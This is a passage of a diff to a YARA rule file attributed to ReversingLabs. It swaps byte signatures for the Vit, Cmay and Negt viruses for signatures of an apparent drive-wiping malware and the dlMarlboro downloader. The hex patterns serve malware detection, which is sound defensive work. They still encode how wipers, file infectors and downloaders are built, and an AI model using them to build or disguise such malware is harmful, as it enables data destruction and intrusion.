-            68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ??
-            ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
-        }
-		$exception1 = {
-            B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08
+		$destroy_if_not_controller = {
+            50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ??
+            C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72
+            C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D
+            ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ??
+            ?? ?? ?? 8B E5 5D C3
         }
-		$exception2 = {
-            55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ??
-            6A ?? 8B 4B ?? 03 CA 8B 01 FF D0
+		$erase_drive_data = {
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A
+            55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3
         }
-		$exceptionallock = {
-            B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ??
-            2B CA 89 4A ?? 33 C0 C3
+		$erase_drives_recursively_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85
+            ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D
+            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00
+            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64
+            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73
+            C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C
+            C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C
+            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00
+            C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8
         }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and $payload and ( $NSIS_CheckIntegrity or ( $UPX_Decompression and $UPX_Encrypting ) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ( $exception1 and $exception2 and $exceptionallock ) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader )
-}
-
-rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Vit virus."
-		author = "ReversingLabs"
-		id = "4515fe43-4c5a-521d-82b7-273823f0c64e"
-		date = "2025-06-08"
-		date = "2025-06-08"
-		modified = "2023-06-07"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Linux.Virus.Vit.yara#L3-L36"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$vit_entry_point = {
-        55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4
-        CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7
-        85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8
-        18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA
-        FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56
-        E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9
-        FF FF BE FF FF FF FF 6A 00 6A 00 E9
-      }
-		$vit_str = "vi324.tmp"
-
-	condition:
-		uint32( 0 ) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str
-}
-
-rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Cmay virus."
-		author = "ReversingLabs"
-		id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d"
-		date = "2020-07-15"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Cmay.yara#L3-L73"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Cmay"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$cmay_body_1 = {
-            60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03
-            00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ??
-            ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ??
-            ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D
-            ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D
-            ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF
-            85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74
-            6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35
-            96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5
-            ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ??
-            ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ??
-            ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74
-            05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
-            8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95
-            ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3
-            18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D
-            ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ??
-            ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89
-            70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54
+		$erase_drives_recursively_2_p1 = {
+            8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ??
+            ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9
+            ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ??
+            74 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
         }
-		$cmay_body_2 = {
-            30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ??
-            ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00
-            00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ??
-            ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78
-            03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ??
-            AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80
-            3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 00 74 03 46
-            EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6
-            74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ??
-            ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ??
-            ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3
-            8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95
-            ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF
-            B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ??
-            C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ??
-            ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00
-            00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0
+		$erase_drives_recursively_2_p2 = {
+            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $cmay_body_1 at pe.entry_point ) and $cmay_body_2
+		uint16( 0 ) == 0x5A4D and ( $destroy_if_not_controller ) and ( $erase_drive_data ) and ( all of ( $erase_drives_recursively_* ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Negt virus."
+		description = "Yara rule that detects dlMarlboro downloader."
 		author = "ReversingLabs"
-		id = "80e83105-dd98-5fad-9119-f851ec3199af"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c"
+		date = "2020-07-23"
+		modified = "2020-07-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Negt.yara#L3-L94"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Negt"
-		tc_detection_factor = 5
+		tc_detection_type = "Downloader"
+		tc_detection_name = "dlMarlboro"
+		tc_detection_factor = 3
 		importance = 25
 
 	strings:
-		$negt_body_and_infector_1 = {
-            6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00
-            3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8
-            FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE
-            FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ??
-            ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ??
-            56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D
-            85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8
-            50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00
-            00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D
-        }
-		$negt_body_and_infector_2 = {
-            EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15
-            07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85
-            EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF
-            FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF
-            FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75
-            08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A
-            04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68
-            ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68
-            ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ??
-            ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ??
-            03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7
-        }
-		$negt_body_and_infector_3 = {
-            05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7
-            05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ??
-            ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04
-            00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00
-            00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00
-            E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ??
-            ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00
-            A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03
-            00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8
-            BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00
+		$ping_apnic = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
         }
-		$negt_body_and_infector_4 = {
-            FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A
-            00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A
-            03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D
-            45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00
-            6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9
-            C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00
-            FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A
